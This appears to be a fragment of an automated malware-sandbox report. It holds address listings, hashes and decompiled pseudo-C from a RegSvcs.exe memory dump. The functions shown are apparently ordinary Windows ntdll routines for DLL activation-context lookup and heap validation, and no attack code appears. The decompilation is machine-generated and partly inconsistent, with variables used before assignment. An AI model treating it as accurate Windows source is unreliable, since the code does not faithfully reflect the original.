                                          0x013b4e3e
                                          0x013b4e43
                                          0x013b4e47
                                          0x013b4e53
                                          0x013b4e58
                                          0x013b4e5a
                                          0x013b4e5c
                                          0x013b4e61
                                          0x013b4e61
                                          0x013b4e5a
                                          0x013b4e6e
                                          0x013b4f41
                                          0x013b4f47
                                          0x013b4f4b
                                          0x013b4f6a
                                          0x013b4f6f
                                          0x013b4f4d
                                          0x013b4f62
                                          0x013b4f67
                                          0x013b4f7f
                                          0x013b4f80
                                          0x013b4f81
                                          0x00000000
                                          0x013b4e74
                                          0x013b4e78
                                          0x013b4e82
                                          0x013b4e88
                                          0x013b4e88
                                          0x00000000
                                          0x013b4e78
                                          0x013b4e6e
                                          0x013b4e38
                                          0x013b4df3
                                          0x013b4bfe
                                          0x013b4c01
                                          0x013b4c04
                                          0x013b4c07
                                          0x013b4c09
                                          0x013b4c0c
                                          0x013b4c0e
                                          0x013b4c0e
                                          0x013b4c11
                                          0x013b4c11
                                          0x013b4c0c
                                          0x013b4c14
                                          0x013b4c17
                                          0x013b4dae
                                          0x013b4db2
                                          0x013b4db7
                                          0x013b4dba
                                          0x013b4dbd
                                          0x013b4ef1
                                          0x013b4ef7
                                          0x013b4efb
                                          0x013b4f1a
                                          0x013b4f1f
                                          0x013b4efd
                                          0x013b4f12
                                          0x013b4f17
                                          0x013b4f2b
                                          0x013b4f2b
                                          0x013b4f2d
                                          0x013b4f2e
                                          0x013b4f2f
                                          0x00000000
                                          0x013b4f2f
                                          0x00000000
                                          0x013b4c1d
                                          0x013b4c1d
                                          0x013b4c20
                                          0x013b4c23
                                          0x013b4c26
                                          0x013b4c29
                                          0x013b4c2c
                                          0x013b4c2e
                                          0x013b4d91
                                          0x013b4d91
                                          0x013b4d92
                                          0x013b4d97
                                          0x013b4d9e
                                          0x00000000
                                          0x013b4d9e
                                          0x013b4c34
                                          0x013b4c37
                                          0x013b4c39
                                          0x013b4c3c
                                          0x00000000
                                          0x00000000
                                          0x013b4c45
                                          0x013b4c48
                                          0x013b4c4e
                                          0x013b4c50
                                          0x013b4c78
                                          0x013b4c78
                                          0x013b4c7b
                                          0x013b4c7d
                                          0x013b4c80
                                          0x013b4c84
                                          0x013b4cad
                                          0x013b4cad
                                          0x013b4cb0
                                          0x013b4cb8
                                          0x013b4cbb
                                          0x013b4cbe
                                          0x013b4cc1
                                          0x013b4cc7
                                          0x013b4cdc
                                          0x013b4cc9
                                          0x013b4cd2
                                          0x013b4cd4
                                          0x013b4cd4
                                          0x013b4cde
                                          0x013b4ce0
                                          0x013b4d13
                                          0x013b4d13
                                          0x013b4d16
                                          0x013b4d18
                                          0x013b4d29
                                          0x013b4d2a
                                          0x013b4d2c
                                          0x013b4d34
                                          0x013b4d1a
                                          0x013b4d1a
                                          0x013b4d1a
                                          0x013b4d1d
                                          0x013b4d1f
                                          0x013b4d22
                                          0x013b4d24
                                          0x013b4d24
                                          0x013b4d3c
                                          0x013b4d3f
                                          0x013b4d45
                                          0x013b4d47
                                          0x013b4d6c
                                          0x013b4d6c
                                          0x013b4d70
                                          0x013b4d7e
                                          0x013b4d84
                                          0x013b4d84
                                          0x00000000
                                          0x013b4d49
                                          0x013b4d49
                                          0x013b4d56
                                          0x013b4d56
                                          0x013b4d59
                                          0x00000000
                                          0x00000000
                                          0x013b4d4e
                                          0x013b4d50
                                          0x013b4d52
                                          0x013b4d8e
                                          0x013b4d5d
                                          0x013b4d5f
                                          0x013b4d67
                                          0x00000000
                                          0x013b4d67
                                          0x013b4d54
                                          0x013b4d54
                                          0x013b4d5b
                                          0x00000000
                                          0x013b4d5b
                                          0x013b4ce2
                                          0x013b4ce2
                                          0x013b4ce5
                                          0x013b4ce5
                                          0x013b4ce7
                                          0x013b4cfb
                                          0x013b4ce9
                                          0x013b4ce9
                                          0x013b4cec
                                          0x013b4cef
                                          0x013b4cf1
                                          0x013b4cf3
                                          0x013b4cf3
                                          0x013b4cf3
                                          0x013b4cf6
                                          0x013b4cf6
                                          0x013b4d02
                                          0x013b4d05
                                          0x00000000
                                          0x00000000
                                          0x013b4d07
                                          0x013b4d0f
                                          0x013b4d11
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b4d11
                                          0x00000000
                                          0x013b4ce5
                                          0x013b4ce0
                                          0x013b4c8a
                                          0x013b4c8f
                                          0x013b4c91
                                          0x00000000
                                          0x00000000
                                          0x013b4c9d
                                          0x00000000
                                          0x013b4c9d
                                          0x013b4c52
                                          0x013b4c5f
                                          0x013b4c5f
                                          0x013b4c62
                                          0x00000000
                                          0x00000000
                                          0x013b4c57
                                          0x013b4c59
                                          0x013b4c5b
                                          0x013b4caa
                                          0x013b4c66
                                          0x013b4c68
                                          0x013b4c70
                                          0x013b4c75
                                          0x00000000
                                          0x013b4c75
                                          0x013b4c5d
                                          0x013b4c5d
                                          0x013b4c64
                                          0x00000000
                                          0x013b4c64
                                          0x013b4c17
                                          0x013b4b75
                                          0x013b4bc4
                                          0x013b4bc8
                                          0x00000000
                                          0x00000000
                                          0x013b4bd9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b4b77
                                          0x013b4b7a
                                          0x013b4b8c
                                          0x013b4b7c
                                          0x013b4b7e
                                          0x013b4b83
                                          0x013b4b86
                                          0x013b4b86
                                          0x013b4b90
                                          0x013b4b93
                                          0x00000000
                                          0x00000000
                                          0x013b4b95
                                          0x013b4bab
                                          0x013b4bb0
                                          0x00000000
                                          0x00000000
                                          0x013b4bb2
                                          0x013b4bb9
                                          0x00000000
                                          0x00000000
                                          0x013b4bbb
                                          0x013b4bbe
                                          0x013b4bc1
                                          0x013b4bc1
                                          0x00000000
                                          0x013b4bc1
                                          0x013b4b97
                                          0x013b4ba4
                                          0x00000000
                                          0x00000000
                                          0x013b4ba6
                                          0x00000000
                                          0x013b4ba6
                                          0x013b4ea9
                                          0x013b4ea9
                                          0x013b4eb2
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: a4f375d40011baf4c9d968c8c8e3ad778bddc6f3ce6f4e68f8360ab86659e973
                                          • Instruction ID: d1c44fa3936a5c7dc4ab451a0be6467c6cd3e802e5374abb4fb07c0155f47bd9
                                          • Opcode Fuzzy Hash: a4f375d40011baf4c9d968c8c8e3ad778bddc6f3ce6f4e68f8360ab86659e973
                                          • Instruction Fuzzy Hash: B012C0306106469FDB25CF69C485BF6BBF5FF48708F14845DE6868BA82E734E880CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01328E00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 126timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E01328E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x13ed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x13e8464; // 0x74660110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x13e5780 & 0x00000003) != 0) {
							E01375510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x13e5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0133B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x13e7984; // 0xe93e68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x13e8464; // 0x74660110
					 *0x13eb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01329B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x13e5780 & 0x00000005) != 0) {
						_push(_t49);
						E01375510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                          0x01328e0f
                                          0x01328e16
                                          0x01328e19
                                          0x01328e1b
                                          0x01328e21
                                          0x01328e7f
                                          0x01328e85
                                          0x01369354
                                          0x0136936c
                                          0x01369371
                                          0x0136937b
                                          0x01369381
                                          0x01369381
                                          0x0136937b
                                          0x01328e9d
                                          0x01328e9d
                                          0x01328e29
                                          0x01328e2c
                                          0x01328e38
                                          0x01328e3e
                                          0x01328e43
                                          0x01328eb5
                                          0x01328eb9
                                          0x013692aa
                                          0x013692af
                                          0x013692e8
                                          0x013692e8
                                          0x013692af
                                          0x01328eb9
                                          0x01328e45
                                          0x01328e53
                                          0x01328e5b
                                          0x01328e5f
                                          0x01328e78
                                          0x01328e78
                                          0x01328e7d
                                          0x01328ec3
                                          0x01328ecd
                                          0x01328ed2
                                          0x01328ed2
                                          0x01328ec5
                                          0x01328ec5
                                          0x00000000
                                          0x01328e7d
                                          0x01328e67
                                          0x01328ea4
                                          0x0136931a
                                          0x00000000
                                          0x00000000
                                          0x01369320
                                          0x01328ea4
                                          0x01328e70
                                          0x01369325
                                          0x01369340
                                          0x01369345
                                          0x01369345
                                          0x01328e76
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Strings
                                          • h>, xrefs: 01328E2C
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01369357
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0136932A
                                          • LdrpFindDllActivationContext, xrefs: 01369331, 0136935D
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 0136933B, 01369367
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$h>$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-2227842046
                                          • Opcode ID: bef443fa2a00ad09a7a05806e8d06c715c068c5ae07f1a3ddb3b4ab6f6cf9791
                                          • Instruction ID: 1dc528790e4fcfb16f4a34b96f5ccc5c01865f0e9ee3241fa5bdd2eb987f8c13
                                          • Opcode Fuzzy Hash: bef443fa2a00ad09a7a05806e8d06c715c068c5ae07f1a3ddb3b4ab6f6cf9791
                                          • Instruction Fuzzy Hash: 2F41D832A403399FEB36BA1CC849B75B7F9AB0475CF0685E9E90C5B591E7709D808781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B4496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E013B4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E013B49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x13e6378 = _t267;
						asm("int3");
						 *0x13e6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0132174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E012FB150();
							} else {
								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E012FB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E012FB150();
							} else {
								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E012FB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x13e6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E01339660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0132174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E012FB150();
										} else {
											E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E012FB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E012FB150();
									} else {
										E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E012FB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E012FB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E012FB150();
							} else {
								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E013B4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E013AFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E013A23E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                          0x013b44a1
                                          0x013b44a3
                                          0x013b44a7
                                          0x013b44ac
                                          0x013b44af
                                          0x013b44b2
                                          0x013b44b9
                                          0x013b44bc
                                          0x013b47f2
                                          0x013b47f2
                                          0x013b47f8
                                          0x013b47fc
                                          0x013b47fe
                                          0x013b4804
                                          0x013b4805
                                          0x013b4805
                                          0x013b480c
                                          0x013b4810
                                          0x013b4812
                                          0x013b4812
                                          0x013b4812
                                          0x013b4822
                                          0x013b4822
                                          0x013b4827
                                          0x013b4827
                                          0x00000000
                                          0x013b4827
                                          0x013b44c4
                                          0x013b44d3
                                          0x013b44d9
                                          0x013b44dc
                                          0x013b44de
                                          0x013b44e0
                                          0x013b4560
                                          0x013b4520
                                          0x013b4522
                                          0x013b4525
                                          0x013b4528
                                          0x013b452b
                                          0x013b452e
                                          0x013b4530
                                          0x013b4697
                                          0x013b469d
                                          0x013b46a1
                                          0x013b46c0
                                          0x013b46c5
                                          0x013b46a3
                                          0x013b46b8
                                          0x013b46bd
                                          0x013b46cb
                                          0x013b46d4
                                          0x013b4677
                                          0x013b4677
                                          0x013b4679
                                          0x013b467c
                                          0x013b468a
                                          0x013b4690
                                          0x013b4690
                                          0x013b47f1
                                          0x013b47f1
                                          0x013b47f1
                                          0x00000000
                                          0x013b47f1
                                          0x013b4536
                                          0x013b4539
                                          0x013b453c
                                          0x013b4636
                                          0x013b463c
                                          0x013b4640
                                          0x013b465f
                                          0x013b4664
                                          0x013b4642
                                          0x013b4657
                                          0x013b465c
                                          0x013b4670
                                          0x00000000
                                          0x013b4542
                                          0x013b4542
                                          0x013b4546
                                          0x013b4548
                                          0x013b454b
                                          0x013b4555
                                          0x013b455b
                                          0x013b455b
                                          0x013b455b
                                          0x013b455d
                                          0x013b455d
                                          0x013b455d
                                          0x00000000
                                          0x013b455d
                                          0x013b453c
                                          0x013b4579
                                          0x013b457c
                                          0x013b4587
                                          0x013b4589
                                          0x013b4591
                                          0x013b4592
                                          0x013b4597
                                          0x013b4598
                                          0x013b45a1
                                          0x013b45ab
                                          0x013b45ab
                                          0x013b45a1
                                          0x013b45ae
                                          0x013b45b4
                                          0x013b45b9
                                          0x013b45bd
                                          0x013b4759
                                          0x013b4759
                                          0x013b475f
                                          0x013b4761
                                          0x013b4763
                                          0x013b4765
                                          0x013b4768
                                          0x013b476b
                                          0x013b476d
                                          0x013b479c
                                          0x013b479c
                                          0x013b479f
                                          0x013b47a2
                                          0x013b47a4
                                          0x013b4830
                                          0x013b4833
                                          0x013b4879
                                          0x013b487d
                                          0x013b48f1
                                          0x013b48f3
                                          0x013b48f3
                                          0x00000000
                                          0x013b48f3
                                          0x013b487f
                                          0x013b4885
                                          0x013b4887
                                          0x013b48a8
                                          0x013b48a8
                                          0x013b48ae
                                          0x013b48b0
                                          0x013b48dc
                                          0x013b48dc
                                          0x013b48dc
                                          0x013b48dc
                                          0x013b48ec
                                          0x00000000
                                          0x013b48ec
                                          0x013b48b2
                                          0x013b48bc
                                          0x013b48be
                                          0x013b48c1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b48c3
                                          0x013b48c3
                                          0x013b48c6
                                          0x013b48c9
                                          0x013b48cc
                                          0x013b48d1
                                          0x013b48d4
                                          0x00000000
                                          0x00000000
                                          0x013b48d6
                                          0x013b48d7
                                          0x013b48da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b48da
                                          0x013b494f
                                          0x013b4955
                                          0x013b4959
                                          0x013b4978
                                          0x013b497d
                                          0x013b495b
                                          0x013b4970
                                          0x013b4975
                                          0x013b4986
                                          0x013b4987
                                          0x013b498a
                                          0x013b498d
                                          0x013b4997
                                          0x013b47ef
                                          0x013b47ef
                                          0x013b47ef
                                          0x00000000
                                          0x013b47ef
                                          0x013b4890
                                          0x013b4890
                                          0x013b4891
                                          0x013b4891
                                          0x013b4894
                                          0x013b4897
                                          0x013b489d
                                          0x013b48a0
                                          0x00000000
                                          0x00000000
                                          0x013b48a2
                                          0x013b48a3
                                          0x013b48a6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b48a6
                                          0x013b48fb
                                          0x013b4901
                                          0x013b4905
                                          0x013b4924
                                          0x013b4929
                                          0x013b4907
                                          0x013b491c
                                          0x013b4921
                                          0x013b492f
                                          0x013b4935
                                          0x013b4936
                                          0x013b4939
                                          0x013b4942
                                          0x00000000
                                          0x013b4947
                                          0x013b4835
                                          0x013b483b
                                          0x013b483f
                                          0x013b485e
                                          0x013b4863
                                          0x013b4841
                                          0x013b4856
                                          0x013b485b
                                          0x013b4869
                                          0x013b486c
                                          0x013b486f
                                          0x013b47e7
                                          0x013b47e7
                                          0x00000000
                                          0x013b47ec
                                          0x013b47aa
                                          0x013b47b0
                                          0x013b47b4
                                          0x013b47d3
                                          0x013b47d8
                                          0x013b47b6
                                          0x013b47cb
                                          0x013b47d0
                                          0x013b47de
                                          0x013b47df
                                          0x013b47e2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b476f
                                          0x013b476f
                                          0x013b4778
                                          0x013b4785
                                          0x013b4787
                                          0x013b478c
                                          0x013b478e
                                          0x00000000
                                          0x00000000
                                          0x013b4790
                                          0x013b4792
                                          0x013b4794
                                          0x00000000
                                          0x00000000
                                          0x013b4796
                                          0x013b4799
                                          0x00000000
                                          0x013b4799
                                          0x00000000
                                          0x013b45c3
                                          0x013b45c3
                                          0x013b45c7
                                          0x013b45c7
                                          0x013b45ca
                                          0x013b45cf
                                          0x013b45d3
